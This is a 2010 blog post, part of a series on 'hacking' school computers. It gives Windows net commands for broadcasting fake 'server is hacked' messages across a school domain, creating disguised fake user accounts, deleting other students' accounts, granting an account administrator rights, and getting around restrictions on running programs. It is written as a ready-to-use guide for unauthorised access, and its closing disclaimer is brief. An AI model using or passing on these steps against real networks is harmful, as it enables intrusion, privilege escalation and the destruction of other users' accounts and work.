Wednesday, November 10, 2010

Hack school computer Part 2...

Sending messages out over the network:

Okay, here's how to send crazy messages to everyone in your school on a computer. In your command prompt, type

Net Send * "The server is hacked"

*Note: may not be necessary, depending on how many your school has access too. If it's just one, you can leave it out*

Where is, replace it with the domain name of your school. For instance, when you log on to the network, you should have a choice of where to log on, either to your school, or to just the local machine. It is generally same as your school, or something like it. So,if my school domain name is xavier, I use

Net Send xavier * "The server is hacked"

The asterisk denotes wildcard sending, or sending to every computer in the domain. You can swap this for people's accounts, for example

NetSend xavier dan,jimmy,admin "The server is hacked"

use commas to divide the names and NO SPACES between them.



Adding/modifying user accounts:

Now that you have a command prompt, you can add a new user (ie yourself) like so

C:>net user username /ADD

where username is the name of your new account. And remember, try and make it look inconspicuous, then they'll just think its a student who really is at school, when really, the person doesn't EXIST! IF you wanna have a password, use this instead:

C:>net user username password /ADD

where password is the password you want to have. So for instance the above would create an account called 'username', with the password being 'password'. The below would have a username of 'RAJ' and a password of 'fruity'

C:>net user RAJ fruity /ADD

Right then, now that we can create accounts, let's delete them

C:>net user Vishal /DELETE

This will delete poor Vishal's account. Awww. Do it to you enemies:P no only joking becuase they could have important work... well okay only if you REALLY hate them


Give you admin priveleges:

C:>net localgroup administrator RAJ /ADD

This will make RAJ an admin. Remember that some schools may not call their admins 'adminstrator' and so you need to find out the name of the local group they belong to.

You can list all the localgroups by typing

C:>net localgroup


Running .exe files you can't usually run:

In the command prompt, use cd (change directory) to go to where the file is, use DIR to get the name of it, and put a shortcut of it on to a floppy. Run the program off the floppy disk.

Well, I hope this article helped a bit. Also, please don't go round screwing up your school servers, they are providing them free to you to help your learning.

Find more about hacking school computers at:
Hack school computer Part 1...
Hack school computer Part 3...
Change Admin password...